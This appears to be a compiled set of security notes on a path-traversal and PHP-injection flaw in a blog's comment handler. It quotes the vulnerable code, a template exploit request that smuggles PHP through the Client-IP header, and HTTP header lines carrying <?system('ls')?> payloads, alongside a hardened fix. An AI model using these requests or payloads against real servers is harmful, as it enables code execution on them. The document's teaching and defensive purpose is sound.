http://archive.cert.uni-stuttgart.de/bugtraq/2007/10/msg00314.html
```php
function write_comment ( $y, $m, $entry, $comment_name,
                         $comment_email, $comment_url, $comment_text, $user_ip,
                         $hold_flag='', $comment_date=null ) {
    // ... (lines elided in the advisory excerpt)
    $basedir = 'content/';
    $dir = $basedir.$y.'/'.$m.'/'.$entry;   // $y, $m and $entry come straight from the request
    // ...
    $dir .= '/comments';
    // ...
    $dir .= '/';
    // ...
    $stamp = date('ymd-His');               // file name depends only on the current time
    if ( $blog_config[ 'blog_enable_gzip_txt' ] ) {
        $entryFile = $dir.'comment'.$stamp.'.txt.gz';
    } else {
        $entryFile = $dir.'comment'.$stamp.'.txt';
    }
    // ... (rest of the function)
```
The variables $y, $m and $entry are sent with the HTTP request.
The file name is chosen with the date() function. There are many
ways to learn the value returned by $stamp:
- Ask the server by sending an HTTP request and reading the "Date" response header.
- Brute-force the path (add several HTML tags).
- Split the attack into two parts (file names are displayed in the HTML source).
```http
POST /comment_add_cgi.php HTTP/1.1
Host: localhost
Connection: keep-alive
Cookie: PHPSESSID=<SID>
Client-IP: <HTML_AND_PHP_CONTENT>
Content-Type: application/x-www-form-urlencoded
Content-Length: <LEN>

y=<Y>&m=<M>&entry=<ENTRY>&comment_name=Hacker &comment_email=my%40you.com&comment_url=&user_ip=<HTML_AND_PHP_CONTENT_URLENCODED>&style_dropdown=--&comment_text=Hello&comment_capcha=128619&submit=%A0Post+Comment%A0
```
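As an added example that is not the blog engine's own code, the hardened form of the path and file-name construction above: each of $y, $m and $entry is allow-listed, the resolved directory is checked against the content root, and the file name comes from the CSPRNG rather than date(), so it can no longer be derived from the Date response header. The function names safe_comment_path() and client_ip() are assumed, as is that the comments directory already exists under 'content/'.

```php
<?php
// Added example, not the blog engine's code: a hardened replacement for the
// path and file-name construction in write_comment(). Assumes the comments
// directory already exists and that comments live under $basedir ('content/').

function safe_comment_path(string $basedir, string $y, string $m,
                           string $entry, bool $gzip): string
{
    // 1. Allow-list every untrusted path component instead of concatenating it
    //    raw; this rejects '..', '/', NUL bytes and any other unexpected input.
    if (!preg_match('/^\d{4}$/', $y)
        || !preg_match('/^(0[1-9]|1[0-2])$/', $m)
        || !preg_match('/^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$/', $entry)) {
        throw new InvalidArgumentException('invalid comment location');
    }
    $dir = rtrim($basedir, '/') . "/$y/$m/$entry/comments";

    // 2. Defence in depth: the resolved directory must still be inside $basedir.
    $baseReal = realpath($basedir);
    $dirReal  = realpath($dir);
    $prefix   = $baseReal . DIRECTORY_SEPARATOR;
    if ($baseReal === false || $dirReal === false
        || strncmp($dirReal, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('comment directory outside content root');
    }

    // 3. Unguessable file name: date('ymd-His') can be recovered from the
    //    server's Date response header; 128 bits from the CSPRNG cannot.
    $name = 'comment' . bin2hex(random_bytes(16)) . ($gzip ? '.txt.gz' : '.txt');
    return $dirReal . DIRECTORY_SEPARATOR . $name;
}

// Use the address the web server saw, never a client-supplied header such as
// Client-IP, which the request above uses to carry content into the file.
function client_ip(): string
{
    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    return filter_var($ip, FILTER_VALIDATE_IP) !== false ? $ip : '0.0.0.0';
}
```

Rejected input raises an exception rather than silently falling back, so a traversal attempt such as entry=../../x shows up in the error log instead of producing a file.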
http://blog.naver.com/hanoul76psy?Redirect=Log&logNo=96001395
```php
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past
```

```
Date: Tue, 15 Nov 1994 08:12:31 GMT
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT
If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 <?system('ls')?>
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
If-Modified-Since: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
If-Unmodified-Since: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 GMT
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
```

About HTTP 1.1 header fields:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html